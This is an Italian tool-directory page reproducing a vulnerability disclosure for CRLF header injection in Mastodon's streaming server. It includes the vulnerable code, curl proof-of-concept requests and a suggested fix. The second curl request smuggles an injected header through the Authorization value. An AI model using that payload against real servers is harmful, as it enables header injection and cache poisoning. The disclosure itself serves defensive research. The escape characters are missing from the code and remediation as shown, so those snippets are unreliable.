Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-Mastodon-Streaming-CRLF-Injection — PoC della vulnerabilità di sicurezza del server di streaming Mastodon - CVE-2026-Mastodon-Streaming-CRLF-Injection | Kitploit
Strumenti/GitHubGitHub/1402307692/cve-2026-mastodon-streaming-crlf-injection
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHub1402307692/cve-2026-mastodon-streaming-crlf-injection

CVE-2026-Mastodon-Streaming-CRLF-Injection

PoC della vulnerabilità di sicurezza del server di streaming Mastodon - CVE-2026-Mastodon-Streaming-CRLF-Injection

Vedi RepositorySito web
24 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-XXXXX: Iniezione dell'header di risposta HTTP (CRLF) nel server di streaming Mastodon

Panoramica della vulnerabilità

VoceDettagli
CVE IDCVE-2026-XXXXX
Prodotto interessatoMastodon (Streaming Server)
Versione interessata<= 4.5.9
Componentestreaming/index.js righe 188-206
Tipo di vulnerabilitàHTTP Response Header Injection / CRLF Injection
CWECWE-74
CVSS 3.16.5 (Medio)
Vettore di attaccoRete
Segnalatoreqitian [email protected]

Descrizione della vulnerabilità

Quando una richiesta di upgrade WebSocket fallisce l'autenticazione, il Mastodon Streaming Server in streaming/index.js righe 188-206 costruisce una risposta HTTP manuale e scrive errorMessage direttamente nell'header di risposta X-Error-Message tramite socket.end() SENZA ripulire i caratteri o .

Ciò consente a un attaccante remoto non autenticato di iniettare header HTTP arbitrari o di effettuare HTTP Response Splitting.

Codice vulnerabile (streaming/index.js righe 188-206)

root@kitploit:~
const { statusCode, errorMessage } = extractErrorStatusAndMessage(err);
const headers = {
  'Connection': 'close',
  'Content-Type': 'text/plain',
  'Content-Length': 0,
  'X-Request-Id': request.id,
  'X-Error-Message': errorMessage   // NO CRLF sanitization
};
socket.end(
  `HTTP/1.1 ${statusCode} ${http.STATUS_CODES[statusCode]}
` +
  `${Object.keys(headers).map((key) => `${key}: ${headers[key]}`).join('
')}

`
);

Impatto

  • Iniezione dell'header HTTP: Iniettare header HTTP arbitrari
  • HTTP Response Splitting: Iniettare un secondo corpo di risposta HTTP (avvelenamento della cache)
  • Divulgazione di informazioni: Messaggi di errore interni esposti a utenti non autenticati

Prova di concetto

PoC 1 - Rilevamento di base

root@kitploit:~
curl -i -X GET \
  -H "Upgrade: websocket" \
  -H "Connection: Upgrade" \
  -H "Sec-WebSocket-Version: 13" \
  -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
  http://TARGET:4000/api/v1/streaming/user

Previsto: HTTP/1.1 401 Unauthorized, X-Error-Message: Missing access token

PoC 2 - Iniezione CRLF

root@kitploit:~
curl -i -X GET \
  -H "Upgrade: websocket" \
  -H "Connection: Upgrade" \
  -H "Sec-WebSocket-Version: 13" \
  -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
  -H "Authorization: Bearer test%0d%0aX-Injected: evil" \
  http://TARGET:4000/api/v1/streaming/user

Rimedio

Ripulire errorMessage prima di scriverlo nell'header del socket:

root@kitploit:~
const sanitizedMessage = String(errorMessage || '')
  .replace(/
/g, '%0D')
  .replace(/
/g, '%0A');
// OR use Node.js res.setHeader() API which prevents header injection

Cronologia

DataEvento
2026-04-22Vulnerabilità scoperta e PoC creato
2026-04-22Segnalazione CVE inviata a MITRE / VDB

Riferimenti

  • https://github.com/mastodon/mastodon
  • https://cwe.mitre.org/data/definitions/74.html

Disclaimer: Questo PoC è solo a scopo educativo e di ricerca sulla sicurezza.

Scarica lo strumento